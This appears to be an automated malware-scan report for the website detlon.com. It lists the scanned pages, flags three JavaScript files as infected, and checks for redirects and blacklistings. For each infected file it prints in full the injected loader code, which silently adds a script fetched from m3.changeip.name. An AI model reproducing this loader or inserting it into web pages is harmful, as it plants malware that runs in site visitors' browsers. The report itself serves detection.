Scanned pages/files
Request | Server response | Status |
http://www.detlon.com/ | 200 OK Content-Length: 7666 Content-Type: text/html | clean |
http://www.detlon.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72177 Content-Type: application/javascript | clean |
http://www.detlon.com/js/jquery-ui-1.8.2.custom.min.js | 200 OK Content-Length: 42581 Content-Type: application/javascript | clean |
http://www.detlon.com/js/jquery.mousewheel.min.js | 200 OK Content-Length: 1816 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var dont=false;
var ds={}
try{ ds.session = sessionStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.session = false;}
try{ ds.local = localStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.local = false;}
try { localStorage.ifr_1234 = "xui"; sessionStorage.ifr_1234 = "xui"; } catch (e) {}
if(ds.local || ds.session) dont=true;
if(!dont) {
    var ddpopka=document.createElement('script');
    ddpopka.src="http://m3.changeip.name/validate.js?ftpid=2796"
    try{ document.body.appendChild(ddpopka); }catch(e){ document.documentElement.appendChild(ddpopka); }
}
Antivirus reports:
http://www.detlon.com/js/vertical.slider.js | 200 OK Content-Length: 4112 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var dont=false;
var ds={}
try{ ds.session = sessionStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.session = false;}
try{ ds.local = localStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.local = false;}
try { localStorage.ifr_1234 = "xui"; sessionStorage.ifr_1234 = "xui"; } catch (e) {}
if(ds.local || ds.session) dont=true;
if(!dont) {
    var ddpopka=document.createElement('script');
    ddpopka.src="http://m3.changeip.name/validate.js?ftpid=2796"
    try{ document.body.appendChild(ddpopka); }catch(e){ document.documentElement.appendChild(ddpopka); }
}
Antivirus reports:
http://www.detlon.com/js/stuff.js | 200 OK Content-Length: 1081 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var dont=false;
var ds={}
try{ ds.session = sessionStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.session = false;}
try{ ds.local = localStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.local = false;}
try { localStorage.ifr_1234 = "xui"; sessionStorage.ifr_1234 = "xui"; } catch (e) {}
if(ds.local || ds.session) dont=true;
if(!dont) {
    var ddpopka=document.createElement('script');
    ddpopka.src="http://m3.changeip.name/validate.js?ftpid=2796"
    try{ document.body.appendChild(ddpopka); }catch(e){ document.documentElement.appendChild(ddpopka); }
}
Antivirus reports:
http://www.detlon.com/menu.js | 200 OK Content-Length: 6039 Content-Type: application/javascript | clean |
http://www.detlon.com/index.php?pg=we_offer | 200 OK Content-Length: 10513 Content-Type: text/html | clean |
http://www.detlon.com/index.php?pg=career | 200 OK Content-Length: 6336 Content-Type: text/html | clean |
http://www.detlon.com/test404page.js | 404 Not Found Content-Length: 2779 Content-Type: text/html | clean |
http://www.detlon.com/javas.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.detlon.com/index.php?pg=about_android | 200 OK Content-Length: 8540 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: detlon.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: detlon.com
Referer: http://www.google.com/search?q=detlon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=detlon.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://detlon.com/
Result: detlon.com is not infected or malware details are not published yet.